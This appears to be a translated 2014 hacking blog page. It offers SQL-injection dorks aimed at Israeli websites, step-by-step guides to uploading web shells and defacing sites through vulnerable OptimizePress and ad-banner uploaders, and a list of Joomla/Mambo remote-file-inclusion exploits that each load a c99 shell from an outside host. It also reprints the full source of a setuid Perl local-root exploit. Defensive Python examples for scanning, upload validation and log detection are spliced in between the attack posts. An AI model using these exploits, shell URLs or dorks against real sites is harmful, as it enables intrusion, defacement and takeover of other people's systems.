Thursday, 17 July 2014

Tutorial: Installing sqlmap on a VPS

    
     
Hi, haha, it's been a while since I posted, since I retired for a bit and now I'm back. OK, this time I'll share a tutorial on installing sqlmap on a VPS.
What you need:
- A PC connected to the Internet
- PuTTY for Windows
- A VPS account
Steps:
1. Open PuTTY and enter your VPS IP.
2. Type "sudo apt-get install git". If that doesn't work, try "yum install git".
3. Type "git clone https://github.com/sqlmapproject/sqlmap.git", press Enter and wait a moment.
4. Once it's done, type "cd sqlmap".
5. Then just type "./sqlmap.py" or "python sqlmap.py".
Watch the video:

SQL Injection Dorks for Israeli Websites

Dorks:
intext:"error in your SQL syntax" +site:il
intext:"mysql_num_rows()" +site:il
intext:"mysql_fetch_array()" +site:il
intext:"Error Occurred While Processing Request" +site:il
intext:"Server Error in '/' Application" +site:il
intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:il
intext:"Invalid Querystring" +site:il
intext:"OLE DB Provider for ODBC" +site:il
intext:"VBScript Runtime" +site:il
intext:"ADODB.Field" +site:il
intext:"BOF or EOF" +site:il
intext:"ADODB.Command" +site:il
intext:"JET Database" +site:il
intext:"mysql_fetch_row()" +site:il
intext:"Syntax error" +site:il
intext:"include()" +site:il
intext:"mysql_fetch_assoc()" +site:il
intext:"mysql_fetch_object()" +site:il
intext:"mysql_numrows()" +site:il
intext:"GetArray()" +site:il
intext:"FetchRow()" +site:il
intext:"Input string was not in a correct format" +site:il
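Every string in the dork list above is the text of a verbose database or runtime error that a web application let through to the client; a page that echoes one is advertising both an injectable query and the backend behind it. The following is an added example, not code from the original post: a Python check that scans response bodies collected from your own application for exactly those signatures, so the leak is found before a search engine indexes it. The signature list is taken from the dorks above; the sample responses are constructed.

```python
import re

# Signatures from the dork list above, grouped by the backend whose presence
# they reveal to whoever is probing the site.
ERROR_SIGNATURES = {
    "mysql": [
        "error in your SQL syntax",
        "mysql_num_rows()", "mysql_fetch_array()", "mysql_fetch_row()",
        "mysql_fetch_assoc()", "mysql_fetch_object()", "mysql_numrows()",
    ],
    "asp/ado": [
        "Microsoft OLE DB Provider for ODBC Drivers error",
        "OLE DB Provider for ODBC", "ADODB.Field", "ADODB.Command",
        "BOF or EOF", "JET Database", "VBScript Runtime", "Invalid Querystring",
    ],
    "asp.net": [
        "Server Error in '/' Application",
        "Input string was not in a correct format",
    ],
    "coldfusion": ["Error Occurred While Processing Request"],
    "php": ["include()", "GetArray()", "FetchRow()"],
    "generic": ["Syntax error"],
}

# Compile once: literal text, case-insensitive, any whitespace run between words.
_PATTERNS = [
    (backend, sig, re.compile(r"\s+".join(re.escape(w) for w in sig.split()), re.IGNORECASE))
    for backend, sigs in ERROR_SIGNATURES.items()
    for sig in sigs
]


def find_error_leaks(body: str) -> list:
    """Return (backend, signature) pairs whose text appears in one response body."""
    return [(backend, sig) for backend, sig, pat in _PATTERNS if pat.search(body)]


def audit_responses(responses: dict) -> dict:
    """Map URL -> leaks for every response that contains at least one signature.

    Feed it bodies your own test client collected (for example after sending a
    lone quote in each parameter); anything reported should be returning a
    generic error page and logging the real error server-side instead."""
    report = {}
    for url, body in responses.items():
        leaks = find_error_leaks(body)
        if leaks:
            report[url] = leaks
    return report


# Constructed sample responses, not captured from any real site.
SAMPLE_RESPONSES = {
    "/product.php?id=1": "<html><body><h1>Widget 1</h1><p>In stock.</p></body></html>",
    "/product.php?id=1'": (
        "Warning: mysql_fetch_array() expects parameter 1 to be resource, "
        "boolean given in /var/www/product.php on line 12\n"
        "You have an error in your SQL syntax; check the manual"
    ),
    "/search.aspx?q=x'": (
        "<h1>Server Error in '/' Application.</h1>"
        "<p>Input string was not in a correct format.</p>"
    ),
}

if __name__ == "__main__":
    for url, leaks in audit_responses(SAMPLE_RESPONSES).items():
        print(url)
        for backend, sig in leaks:
            print(f"  leaks {backend} error text: {sig!r}")
```

The "Syntax error" and "include()" entries are deliberately broad (they also match help text), so treat a hit on those alone as something to review by hand rather than an automatic finding.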

Defacing with OptimizePress

What you need:
- A shell (any shell you like)
- A computer (connected to the Internet :D)

Steps:

1) Open Google.com and enter the following dork.
Dork: inurl:/wp-content/themes/OptimizePress/

2) Once you've found a site,
3) enter the exploit: /wp-content/themes/OptimizePress/lib/admin/media-upload.php
4) If it works, a page like the following will appear.

5) Scroll down; there's an uploader, so upload your shell =))
6) If it works, your shell's name will be shown. For example, my shell is named b.php

7) The shell is located at http://site/wp-content/uploads/optpress/images_comingsoon/yourshell.php
Example: http://site/wp-content/uploads/optpress/images_comingsoon//2013121101-39-39b.php

Defacing Advertising Sites

The only tool you need is Live HTTP Headers; download it HERE, or you can use THIS one instead.
Dork: intext:pasang iklan gratis (use your brain :D)
Prepare your shell and rename it to .jpg,
for example shell.php.jpg

Find a site, then exploit it by appending /banner/pasang,
for example www.site.com/banner/pasang

Once you've found one, go to the "pasang iklan banner" (place a banner ad) page,
fill in the form with whatever data,
and in the upload field put the shell you renamed earlier.

Submit the ad; the tamper menu will pop up, so tamper the data:
find the name shell.php.jpg and rename it back to shell.php

And tadaaa, your shell is on the site. By default it ends up at target.com/images/bnrs/(shellname).php, but that also depends on the site's settings.

What you do next is up to you.
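The trick described above works only because the upload handler trusts the filename the client sends (it accepts shell.php.jpg because the name ends in .jpg, and it keeps the client's name, so the tampered shell.php lands on disk unchanged). The following is an added example, not code from the original post, of the server-side checks that close it: validate the last extension against an allow-list, reject an interpreter extension anywhere in the name, verify the content's magic bytes, and store the file under a server-chosen name. The function name validate_upload and the sample bytes are constructed for the demo.

```python
import os
import re

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Anything a web server might hand to an interpreter. If one of these appears
# as ANY dotted segment of the name (shell.php.jpg, shell.php;.jpg), reject.
EXECUTABLE_EXT = {"php", "php3", "php4", "php5", "phtml", "phar",
                  "asp", "aspx", "jsp", "cgi", "pl", "sh", "htaccess"}
# Leading bytes each allowed type must start with.
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8",
}


def validate_upload(filename: str, data: bytes) -> tuple:
    """Return (True, stored_name) or (False, reason).

    Order of checks: the last extension must be on the allow-list, no
    interpreter extension may appear anywhere in the name, and the content
    must carry the magic bytes of the claimed type. The stored name is chosen
    by the server, so the client-supplied name (the thing tampered in transit
    above) never reaches the filesystem."""
    base = os.path.basename(filename.replace("\\", "/"))   # drop any directory part
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing or empty extension"
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not allowed"
    # Split on '.', ';' and NUL too, since some servers treat those as the end
    # of the filename and would see "shell.php" in "shell.php;.jpg".
    for seg in re.split(r"[.;\x00]", base.lower()):
        if seg in EXECUTABLE_EXT:
            return False, f"interpreter extension .{seg} inside name"
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match claimed image type"
    return True, f"{os.urandom(8).hex()}.{ext}"


# Constructed test inputs: a JPEG header and a harmless PHP-looking payload.
JPEG_BYTES = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
PHP_BYTES = b"<?php echo 'constructed sample'; ?>"

if __name__ == "__main__":
    for name, data in [("shell.php.jpg", JPEG_BYTES), ("shell.php", PHP_BYTES),
                       ("photo.jpg", PHP_BYTES), ("../../photo.jpg", JPEG_BYTES)]:
        print(f"{name:18} -> {validate_upload(name, data)}")
```

Storing uploads outside the web root, or in a directory where the server is configured not to execute scripts, is the second half of the fix: even a file that slips past the name check then cannot run.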

Joomla Exploit Collection


Google dork:
inurl:"com_joomlaboard"
Exploit: /components/com_joomlaboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
Exploit: /components/com_joomlaboard/image_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:"com_admin"
Exploit: /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_simpleboard
Exploit: /components/com_simpleboard/file_upload.php?sbp=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:"com_hashcash"
Exploit: /components/com_hashcash/server.php?mosConfig_absolute_path=http://hostingan.com/sh3LL/c99.txt?
-----------------------------------------------------------------------
Google dork:
inurl:"com_sitemap"
Exploit: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_forum"
Exploit: /components/com_forum/download.php?phpbb_root_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_pccookbook"
Exploit: /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_extcalendar
Exploit: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"minibb"
Exploit: /components/minibb/index.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_smf"
Exploit: /components/com_smf/smf.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /modules/mod_calendar.php?absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_pollxt"
Exploit: /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_loudmounth"
Exploit: /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_videodb"
Exploit: /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:index.php?option=com_pcchess
Exploit: /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_multibanners"
Exploit: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_a6mambohelpdesk"
Exploit: /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_colophon"
Exploit: /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_mgm"
Exploit: /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_mambatstaff"
Exploit: /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_securityimages"
Exploit: /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /components/com_securityimages/lang.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_artlinks"
Exploit: /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_galleria"
Exploit: /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_zoom"
Exploit: /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"com_serverstat"
Exploit: /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
Exploit: /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
-----------------------------------------------------------------------
Google dork:
inurl:"mambo"
Exploit: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hostingan.com/sh3LL??
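Both the OptimizePress write-up earlier and the Joomla list above leave a distinctive trace in the web server's access log: requests to the unauthenticated media-upload.php endpoint (and later to a .php file under the optpress upload directory), and requests in which a path-style parameter such as mosConfig_absolute_path, mosConfig_live_site, absolute_path, phpbb_root_path or sbp carries a URL instead of a local path, the remote-file-inclusion pattern every entry above relies on. The following is an added example, not code from the original post: detection logic for both patterns, run over Apache combined-format log lines that are constructed for the demo (documentation IP ranges and an .invalid host stand in for real ones).

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/nginx "combined" access log; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths from the OptimizePress write-up above (compared lower-cased).
OPTPRESS_ENDPOINT = "/wp-content/themes/optimizepress/lib/admin/media-upload.php"
OPTPRESS_UPLOAD_DIR = "/wp-content/uploads/optpress/"

# Parameter names used by the Joomla/Mambo RFI list above. Their legitimate
# values are local filesystem paths, so a URL value is the tell.
RFI_PARAM_RE = re.compile(r"absolute_path|live_site|root_path|^sbp$", re.IGNORECASE)
URL_VALUE_RE = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)


def classify(line: str) -> list:
    """Return alert tags for one log line; [] means nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path).lower()
    alerts = []
    if path == OPTPRESS_ENDPOINT:
        # Any hit is worth a look: the write-up shows the uploader needs no login.
        alerts.append("optimizepress-media-upload")
    elif path.startswith(OPTPRESS_UPLOAD_DIR) and path.endswith(".php"):
        # A .php file being executed from the image upload directory.
        alerts.append("php-under-optpress-uploads")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if RFI_PARAM_RE.search(name) and URL_VALUE_RE.match(unquote(value).strip()):
            alerts.append(f"rfi:{name}")
    return alerts


def scan_log(text: str) -> list:
    """Return (ip, target, alerts) for every line that raised at least one alert."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        alerts = classify(line)
        if alerts:
            m = LOG_RE.match(line)
            ip, target = (m.group("ip"), m.group("target")) if m else ("?", line[:60])
            hits.append((ip, target, alerts))
    return hits


# Constructed log excerpt: one benign request, the OptimizePress sequence, one
# RFI attempt against com_forum, and one ordinary Joomla request.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Jul/2014:10:01:02 +0700] "GET /index.php HTTP/1.1" 200 5123
203.0.113.5 - - [17/Jul/2014:10:01:09 +0700] "GET /wp-content/themes/OptimizePress/lib/admin/media-upload.php HTTP/1.1" 200 2210
203.0.113.5 - - [17/Jul/2014:10:01:40 +0700] "POST /wp-content/themes/OptimizePress/lib/admin/media-upload.php HTTP/1.1" 200 412
203.0.113.5 - - [17/Jul/2014:10:02:01 +0700] "GET /wp-content/uploads/optpress/images_comingsoon/2013121101-39-39b.php HTTP/1.1" 200 88
198.51.100.7 - - [17/Jul/2014:11:15:00 +0700] "GET /components/com_forum/download.php?phpbb_root_path=http://EXAMPLE-RFI-HOST.invalid/x.txt?? HTTP/1.0" 200 0
198.51.100.7 - - [17/Jul/2014:11:15:03 +0700] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 9000
"""

if __name__ == "__main__":
    for ip, target, alerts in scan_log(SAMPLE_LOG):
        print(f"{ip:15} {','.join(alerts):30} {target}")
```

The RFI check keys on the parameter name and value shape rather than on the exact component paths, so it also catches the many other components of that era that took the same mosConfig_* and *_path parameters; on the server side, PHP's allow_url_include=Off (and allow_url_fopen=Off where the application tolerates it) removes the class of bug outright.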

Root Exploit


The exploit looks like this:
/*
 * Copyright Kevin Finisterre
 *
 * ** DISCLAIMER ** I am in no way responsible for your stupidity.
 * ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and or execution of this code.
 *
 * ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
 * ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or someone elses).
 * ** WARNING ** have a boot disk ready incase some thing goes wrong.
 *
 * Setuid Perl exploit by KF - kf_lists[at]secnetops[dot]com - 1/30/05
 *
 * this exploits a vulnerability in the PERLIO_DEBUG functionality
 * tested against sperl5.8.4 on Debian
 *
 * kfinisterre@jdam:~$ cc -o ex_perl ex_perl.c
 * kfinisterre@jdam:~$ ls -al /etc/ld.so.preload
 * ls: /etc/ld.so.preload: No such file or directory
 * kfinisterre@jdam:~$ ./ex_perl
 * sperl needs fd script
 * You should not call sperl directly; do you need to change a #! line
 * from sperl to perl?
 * kfinisterre@jdam:~$ su -
 * jdam:~# id
 * uid=0(root) gid=0(root) groups=0(root)
 * jdam:~# rm /etc/ld.so.preload
 *
 */
#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <stdlib.h>     /* exit(), system(), putenv() */
#include <strings.h>
#include <sys/stat.h>   /* umask() */

int main(int argc, char **argv)
{
    FILE *getuid;

    /* write and build a shared object whose getuid() always returns 0 */
    if (!(getuid = fopen("/tmp/getuid.c", "w+"))) {
        printf("error opening file\n");
        exit(1);
    }
    fprintf(getuid, "int getuid(){return 0;}\n");
    fclose(getuid);
    system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");

    /* sperl honours PERLIO_DEBUG while still setuid root, which is the bug */
    putenv("PERLIO_DEBUG=" PRELOAD);
    umask(001); // I'm rw-rw-rw james bitch!
    system("/usr/bin/sperl5.8.4");

    /* the file is now writable by us; fill it with the preload entry */
    FILE *ld_so_preload;
    char preload[] = {
        "/tmp/getuid.so\n"
    };
    if (!(ld_so_preload = fopen(PRELOAD, "w+"))) {
        printf("error opening file\n");
        exit(1);
    }
    fwrite(preload, sizeof(preload) - 1, 1, ld_so_preload);
    fclose(ld_so_preload);
}
Huh, the id is already root?? xD. For other kernels it's not much different.
Hehehe, go ahead and look for other local root exploits.
Quoted from http://www.k-otik.com/exploits/20050207.ex_perl.c.php
To recover from it, do the following:
1. Boot from Knoppix or a Linux rescue disk.
2. Then look for the file /etc/ld.so.preload.
3. That file contains the line /tmp/getuid.so.
4. If the file is there, just delete it, don't hesitate.
5. After that, boot from the hard disk again; no need to reinstall.
So the way this exploit works is that when we boot, the system will look for the file /tmp/getuid.so, which doesn't actually exist... so be careful with this exploit... if you don't want to be left confused.
So to all the friends who have helped me, thank you very much :) :D

Admin Finder [PYTHON SCRIPT]

Hello friends :D
This time I'll share a tool for finding the admin login page of a website :D After all, it's useless to know the admin's username and password if you don't know where the admin login page is :D

Before using adminfinder.py, make sure Python is installed on your PC. If it isn't, download it here:
-Download Python

Okay, done? Then go ahead and grab it :D
-Download Admin Finder [PYTHON SCRIPT]


Admin Finder

Thanks for visiting ^_^ don't forget to leave a comment ^_^

EXPLOIT DATABASE

PACKETSTORM DATABASE

  • 16 July 2014: Oracle Data Redaction Is Broken
    Oracle data redaction is a simple but clever and innovative idea from Oracle. However, at present, there are weaknesses that undermine its effectiveness as a good security mechanism. These weaknesses can be exploited via web based SQL injection attacks and this paper details those weaknesses and provides suggestions on how it can be improved and made more secure.
  • 16 July 2014: pyClamd 0.3.10
    pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product.
  • 16 July 2014: Bitdefender GravityZone File Disclosure / Missing Authentication
    Bitdefender GravityZone versions prior to 5.1.11.432 suffer from local file disclosure, insecure service configuration, and missing authentication vulnerabilities.
  • 16 July 2014: Microsoft Windows DirectShow Privilege Escalation
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Windows. The vulnerability is caused by an input validation error in DirectShow when processing and unserializing "Stretch" objects in memory, which could be exploited to elevate privileges and execute arbitrary code in the context of the logged on user, or e.g. bypass Internet Explorer's Enhanced Protected Mode (EPM) sandbox.
  • 16 July 2014: e107 2.0 alpha2 Cross Site Scripting
    e107 version 2.0 alpha2 suffers from a reflective cross site scripting vulnerability.
  • 16 July 2014: Citrix Netscaler Disclosure / Cross Site Scripting
    Citrix NetScaler Application Delivery Controller and Citrix NetScaler Gateway are susceptible to cookie disclosure and reflective cross site scripting vulnerabilities.
  • 16 July 2014: Microsoft Internet Explorer ShowSaveFileDialog() Sandbox Bypass
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused due to an invalid handling of a sequence of actions aimed to save a file when calling "ShowSaveFileDialog()", which could be exploited by a sandboxed process to write files to arbitrary locations on the system and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: OpenVPN Access Server Arbitrary Code Execution
    Remote attackers can execute arbitrary code and execute other attacks on computers with the OpenVPN Access Server "Desktop Client" installed.
  • 16 July 2014: Microsoft Internet Explorer Request Object Confusion Sandbox Bypass
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by an object confusion vulnerability when processing object types within data shared between the broker and sandboxed processes, which could be exploited by a sandboxed process to achieve code execution within the broker context and bypass IE Protected Mode sandbox. Versions 8, 9, 10, and 11 are affected.
  • 16 July 2014: Microsoft Internet Explorer CSS @import Memory Corruption
    VUPEN Vulnerability Research Team discovered a critical vulnerability in Microsoft Internet Explorer. The vulnerability is caused by a use-after-free vulnerability when manipulating CSS @import statements through "addImport()" or "removeImport()", which could be exploited by attackers to leak arbitrary memory or execute arbitrary code via a malicious web page. Versions 9, 10, and 11 are affected.
  • 16 July 2014: Alfresco Community Edition 4.2.f Server Side Request Forgery
    Alfresco Community Edition versions 4.2.f and below suffer from multiple server side request forgery vulnerabilities.
  • 16 July 2014: HP Security Bulletin HPSBMU03072 SSRT101644
    HP Security Bulletin HPSBMU03072 SSRT101644 - A potential security vulnerability has been identified with HP Data Protector. This vulnerability could be remotely exploited to execute arbitrary code. Revision 1 of this advisory.
  • 16 July 2014: Ubuntu Security Notice USN-2280-1
    Ubuntu Security Notice 2280-1 - It was discovered that MiniUPnPc incorrectly handled certain buffer lengths. A remote attacker could possibly use this issue to cause applications using MiniUPnPc to crash, resulting in a denial of service.
  • 16 July 2014: Ubuntu Security Notice USN-2279-1
    Ubuntu Security Notice 2279-1 - Ben Hawkes discovered that Transmission incorrectly handled certain peer messages. A remote attacker could use this issue to cause a denial of service, or possibly execute arbitrary code.
  • 16 July 2014: Red Hat Security Advisory 2014-0889-01
    Red Hat Security Advisory 2014-0889-01 - The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit. It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions. A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.
